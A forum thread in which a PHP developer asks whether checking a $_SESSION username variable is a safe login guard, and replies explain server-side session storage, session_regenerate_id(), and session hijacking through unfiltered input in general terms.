PHP Login Vulnerability, perhaps

On successful login I create a session cookie such as

$_SESSION['useris'] = $user;

Then, in restricted pages I check to see if this session cookie is set, if not, I redirect to the index.php

How safe is this? Couldn’t someone fake the session cookie with someone elses username if they know it?

If you know the session id, you can take over the session. Keyword IF.

You wouldn’t need to take over an existing session to get past that though. If you knew what balues are being stored in the session you could just create them for yourself. In this case if someone were able to figure out that the session variable is called useris and contains the user then knowing a user they could access it. Of course they’d need to know both the name of the session variable and a valid value for it to do that - again something unlikely since there is noting visible on a web site to show what session variables it is using unless it is an identified open source script or where the code is posted elsewhere (such as asking a question about it) and where it can be matched up to the actual site using it.

The use of session_regenerate_id() would probably help a little bit

I was under the impression that a session cookie only contained the identifier needed to access the actual session, stored on the server…

So storing a users information within a $_SESSION variable, would be more secure than storing the information within a $_COOKIE variable… since the data in the $_COOKIE comes directly from the user and should be considered “unsafe”…

I was under the impression that a session cookie only contained the identifier needed to access the actual session, stored on the server…

So storing a users information within a $_SESSION variable, would be more secure than storing the information within a $_COOKIE variable… since the data in the $_COOKIE comes directly from the user and should be considered “unsafe”…

This is what I thought too.

You wouldn’t need to take over an existing session to get past that though. If you knew what balues are being stored in the session you could just create them for yourself.

And this values would override the ones in the server?

Now that I’d like to see. Sessions are not user-data, and it can not be entered by users. The only thing about a session that is stored on the users’ computer is the session_id, a unique identifier for that session. The user has no means to say: I know there is an index called “useris” and I would like to override it’s values with “x”. The user will never see “useris”, because that doesn’t get communicated and stays server-side.

There is, however, the possibility that your scripts aren’t secured against session hijacking, a very real threat in most applications. Roughly explained, an attacker will create a script in your application because you didn’t filter the input, and uses javascript to read out and submit the session_id of other users. From there, it’s usually trivial to get an admin session, and from there, it gets easy to break an application.

I’m guessing, as felgall is a smart man, that he was accidentally talking about cookies instead of sessions.